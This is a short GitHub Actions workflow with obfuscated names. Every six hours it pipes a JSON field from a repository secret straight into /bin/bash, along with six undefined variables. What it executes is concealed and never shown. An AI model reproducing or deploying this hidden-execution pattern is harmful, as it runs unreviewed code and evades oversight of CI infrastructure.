name: liucanbai3456

on:
  workflow_dispatch:
  schedule:
    - cron: '9 0/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: liucanbai3456
        env:
          grkq2: ${{ secrets.grkq2 }}
        run: |
          echo $grkq2 | jq -r .cglk52694 | /bin/bash
          echo $oii9472 | jq -r .zhvz350 | /bin/bash
          echo $zxev76161 | jq -r .jvz9 | /bin/bash
          echo $m331 | jq -r .uykif3 | /bin/bash
          echo $iql6625 | jq -r .z801 | /bin/bash
          echo $y98 | jq -r .xffxp1 | /bin/bash
          echo $ridvt2044 | jq -r .owp50820 | /bin/bash

